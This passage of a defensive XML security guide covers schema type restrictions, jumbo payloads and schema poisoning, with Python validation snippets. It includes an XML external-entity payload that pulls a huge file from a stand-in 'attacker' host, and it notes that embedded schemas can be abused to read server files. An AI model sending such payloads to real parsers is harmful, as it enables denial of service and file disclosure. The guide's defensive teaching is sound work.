        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, an attacker who provides a negative number might cause a negative result on the user’s account. To avoid that logical vulnerability, the data type should probably be &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;. &lt;br /&gt;
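&lt;br /&gt;
The same lower bound can be mirrored in application code as a second line of defense. The sketch below is an illustration only: the function name is hypothetical, and it assumes the price and quantity have already been extracted from a validated document.&lt;br /&gt;

```python
from decimal import Decimal


def order_total(price: Decimal, quantity: int) -> Decimal:
    """Return price * quantity, mirroring the lower bound of positiveInteger."""
    if isinstance(quantity, bool) or not isinstance(quantity, int):
        raise TypeError("quantity must be an integer")
    if not quantity >= 1:
        raise ValueError("quantity must be at least 1")
    return price * quantity
```

A negative or zero quantity now fails before any amount is computed, so the total can never reduce what the user owes.&lt;br /&gt;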
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever user-controlled values are used as denominators in a division, developers should avoid allowing the number zero. In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that these data types are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
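This XML schema provides a set of restrictions over the &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; document shown earlier. Because &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not valid &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; values, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; set to either of them is rejected during validation and never reaches the application. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;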
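&lt;br /&gt;
The same pitfall exists in application code. As a hedged illustration, Python's &amp;lt;tt&amp;gt;decimal.Decimal&amp;lt;/tt&amp;gt; constructor accepts the strings NaN and Infinity, so a price parser has to reject them explicitly. The function name below is hypothetical, and the accepted syntax is Python's, which is not identical to the lexical space of the schema type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; (exponent notation, for instance, is accepted here).&lt;br /&gt;

```python
from decimal import Decimal, InvalidOperation


def parse_price(text: str) -> Decimal:
    """Convert text to a finite Decimal, rejecting NaN and the infinities."""
    try:
        value = Decimal(text.strip())
    except InvalidOperation as exc:
        raise ValueError(f"not a number: {text!r}") from exc
    if not value.is_finite():
        raise ValueError(f"special value not allowed: {text!r}")
    return value
```

Rejecting the special values at the boundary keeps later arithmetic, comparisons, and storage from having to handle them.&lt;br /&gt;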
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights have only three colors, only 12 months are available, and so on. The schema can have these restrictions in place for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element &amp;lt;tt&amp;gt;month&amp;lt;/tt&amp;gt; to 12 possible values:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minLength value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a specific length (let's say 8), the exact length can be specified as follows:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add pattern restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:pattern value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only values between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for an SSN.&lt;br /&gt;
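&lt;br /&gt;
An XML schema pattern always has to match the entire value. When the same check is repeated in application code, the regular expression must be anchored in an equivalent way. A minimal Python sketch follows; the names are hypothetical, and the whitespace collapsing that the &amp;lt;tt&amp;gt;token&amp;lt;/tt&amp;gt; type performs before matching is not reproduced.&lt;br /&gt;

```python
import re

# Same expression as the pattern facet in the schema above.
SSN_PATTERN = re.compile(r"[0-9]{3}-[0-9]{2}-[0-9]{4}")


def is_valid_ssn(text: str) -> bool:
    """Return True only when the whole string matches the SSN pattern."""
    return SSN_PATTERN.fullmatch(text) is not None
```

Using &amp;lt;tt&amp;gt;fullmatch&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;search&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;match&amp;lt;/tt&amp;gt; prevents a valid SSN embedded in a longer string from being accepted.&lt;br /&gt;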
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:assertion test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
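&lt;br /&gt;
Assertions are a feature of XML Schema 1.1, so a validator limited to version 1.0 will not enforce them. An application may therefore want an equivalent guard in code. The following is a minimal sketch with a hypothetical function name:&lt;br /&gt;

```python
def divide(numerator: int, denominator: int) -> float:
    """Divide two integers, refusing a zero denominator but allowing negatives."""
    if denominator == 0:
        raise ValueError("denominator must not be zero")
    return numerator / denominator
```

As with the assertion, negative denominators remain valid; only the value zero is refused.&lt;br /&gt;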
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Not defining a maximum number of occurrences can have serious consequences when the application receives an extreme number of items to process. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack, you must use a schema with strong data types for each value, defining properly nested structures with specific arrangements and numbers of items. The content of each attribute and element should be properly analyzed to contain valid values before being stored or processed. &lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;soapenv:Envelope xmlns:soapenv=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot; xmlns:ext=&amp;quot;http://com/ibm/was/wssample/sei/echo/b2b/external&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;soapenv:Header largename1=&amp;quot;largevalue&amp;quot; largename2=&amp;quot;largevalue&amp;quot; largename3=&amp;quot;largevalue&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE TAG [&lt;br /&gt;
     &amp;lt;!ENTITY FILE  SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TAG&amp;gt;&amp;amp;FILE;&amp;lt;/TAG&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
; Recommendation&lt;br /&gt;
Check the document size prior to parsing its contents, and use an XML schema to validate the document structure. &lt;br /&gt;
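&lt;br /&gt;
A size check of this kind can be sketched in Python as follows. This is a minimal illustration under stated assumptions, not a definitive implementation: the names &amp;lt;tt&amp;gt;read_limited&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;PayloadTooLarge&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;MAX_XML_BYTES&amp;lt;/tt&amp;gt;, as well as the one-megabyte limit, are hypothetical and chosen only for the example. The check bounds the bytes received; it does not bound what an external entity may pull in during parsing.&lt;br /&gt;

```python
import io

MAX_XML_BYTES = 1_000_000  # assumed limit; tune it for the application


class PayloadTooLarge(Exception):
    """Raised when a document exceeds the configured size limit."""


def read_limited(stream, max_bytes=MAX_XML_BYTES):
    """Read at most max_bytes from stream, failing if more data is available."""
    # Read one extra byte so an oversized payload is detected without
    # buffering the whole document in memory.
    data = stream.read(max_bytes + 1)
    if len(data) > max_bytes:
        raise PayloadTooLarge(f"document exceeds {max_bytes} bytes")
    return data


# Usage: only hand the returned bytes to the XML parser.
document = read_limited(io.BytesIO(b"small payload"))
```

Reading one byte more than the limit lets the check fail early instead of buffering an arbitrarily large document.&lt;br /&gt;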
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing any type of data to be sent to the server. Furthermore, if the server processes external entities, the attacker could use the schema, for example, to read files stored on the server. An embedded schema of this type serves only as a suggestion of how a document should be structured; to be used safely, there must be a way to verify its integrity.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
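&lt;br /&gt;
A deployment check for this condition could look like the following Python sketch. The function name &amp;lt;tt&amp;gt;writable_by_others&amp;lt;/tt&amp;gt; is hypothetical, and the sketch assumes a POSIX filesystem where the mode string has the same layout as the listing above.&lt;br /&gt;

```python
import os
import stat


def writable_by_others(path):
    """Return True if group or other users may modify the file at path."""
    # stat.filemode renders the mode like "ls -l", for example "-rw-rw-rw-".
    mode_string = stat.filemode(os.stat(path).st_mode)
    group_write = mode_string[5] == "w"   # second character of the group triplet
    other_write = mode_string[8] == "w"   # second character of the other triplet
    return group_write or other_write
```

An application could refuse to load a local schema for which this check returns &amp;lt;tt&amp;gt;True&amp;lt;/tt&amp;gt;.&lt;br /&gt;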
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker who can observe the connection could sniff the traffic and modify the schema before it reaches the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an Internet Protocol (IP) address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own IP addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, example.com resolves to the IP address 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may actually be retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid the schema poisoning attack, you must use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
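&lt;br /&gt;
The integrity check mentioned above can be sketched in Python by comparing the schema against a pinned digest. The function name &amp;lt;tt&amp;gt;schema_is_trusted&amp;lt;/tt&amp;gt; and the choice of SHA-256 are assumptions made for this example; the known-good digest would have to be recorded out of band when the schema is first reviewed.&lt;br /&gt;

```python
import hashlib
import hmac


def schema_is_trusted(schema_bytes, expected_sha256_hex):
    """Compare the SHA-256 digest of a schema with a pinned, known-good digest."""
    actual = hashlib.sha256(schema_bytes).hexdigest()
    # compare_digest avoids leaking where the two strings differ.
    return hmac.compare_digest(actual, expected_sha256_hex.lower())
```

A schema that fails this check should be rejected rather than used for validation.&lt;br /&gt;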
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
